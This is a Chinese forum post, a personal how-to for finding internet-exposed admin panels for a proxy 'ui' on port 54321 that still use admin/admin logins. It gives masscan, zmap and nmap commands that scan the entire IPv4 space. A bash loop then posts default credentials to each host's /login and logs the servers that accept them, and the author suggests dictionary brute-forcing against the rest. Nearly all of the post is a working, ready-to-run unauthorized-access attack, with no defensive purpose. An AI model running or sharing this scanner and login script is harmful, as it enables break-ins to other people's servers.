记录一次扫描某ui弱密码的过程 1

练手玩了一下网络扫描工具，在一台快到期的机器上试了下全网扫描
常用的扫描软件有nmap，zmap，masscan等，以扫描某ui为例

安装

debian下都可以一键安装

apt install -y nmap zmap masscan

粗扫

先用这些软件进行端口粗扫，用哪个都行

masscan

masscan 0.0.0.0/0 -p54321 --banners --exclude 255.255.255.255 -oJ scan.json

zmap

zmap --target-port=54321 --output-file=scan.log

nmap

nmap -sS 0.0.0.0/0 -p 54321 | grep -v failed > scan.log

弱口令尝试

早年一些某ui的一键安装脚本采用admin/admin的弱密码，很多人都懒得改，因此可以针对开放默认端口54321的服务器逐一尝试登录

#!/bin/bash

for ip_ad in $(sed -nE  's/.*"ip": "([^"] )".*/\1/p' scan.json); do
        if curl --max-time 1 http://$ip_ad:54321; then
                res=$(curl "http://${ip_ad}:54321/login"  --data-raw 'username=admin&password=admin' --compressed  --insecure)
                if [[ "$res" =~ .*true.* ]]; then
                        echo $ip_ad | tee >> week.log
                fi
                echo $ip_ad | tee >> all.log
        fi
done;

week.log里面就是所有扫出来的可以弱口令登录的机器，挺容易扫出来的
all.log是改了密码的机器，有兴趣可以尝试进一步字典枚举

论坛不让发神秘链接，就点到为止了

相关链接

• 奇安信攻防社区-如何快速扫描全网端口
• 比一比Nmap、Zmap、Masscan三种扫描工具